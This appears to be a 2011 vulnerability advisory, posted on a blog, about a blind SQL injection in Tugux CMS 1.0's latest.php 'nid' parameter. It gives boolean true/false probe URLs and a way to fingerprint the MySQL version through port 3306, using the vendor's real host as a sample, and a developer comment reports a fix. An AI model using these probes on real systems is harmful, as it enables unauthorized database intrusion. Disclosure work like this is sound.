2011/03/18

Tugux CMS (nid) BLIND sql injection vulnerability

===================================================================
Tugux CMS (nid) BLIND sql injection vulnerability
===================================================================

Software: Tugux CMS
Vendor: www.tugux.com
Vuln Type: BLind SQL Injection
Download link: http://sourceforge.net/projects/tuguxcms/files/tuguxCMS_v.1.0_final.rar/download
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info


===================================================================

exploit & p0c

[!] latest.php?nid=[valid nid]

Example p0c

[!] http://host/latest.php?nid=9 <= True
[!] http://host/latest.php?nid=-9 <= False

[+] http://host:3306 <= download the file , save and open with c++ or wordpad will show mysql version

[!] sample: http://www.tugux.com:3306 result : 5.0.92-community (use versi 5.0.92) :D


====================================================================

Nothing Impossible In This World Even Nobody`s Perfect

===================================================================

==========================| -=[ E0F ]=- |==========================

2 comments:

  1. HI i am the deveoper of the Tugux CMS.. thanks to tell me about security fix. i fixed the security leak. to prevent TUGUX CMS by SQL injection... once again thanks. if you want to help us improve tugux CMS. you can join our team

    ReplyDelete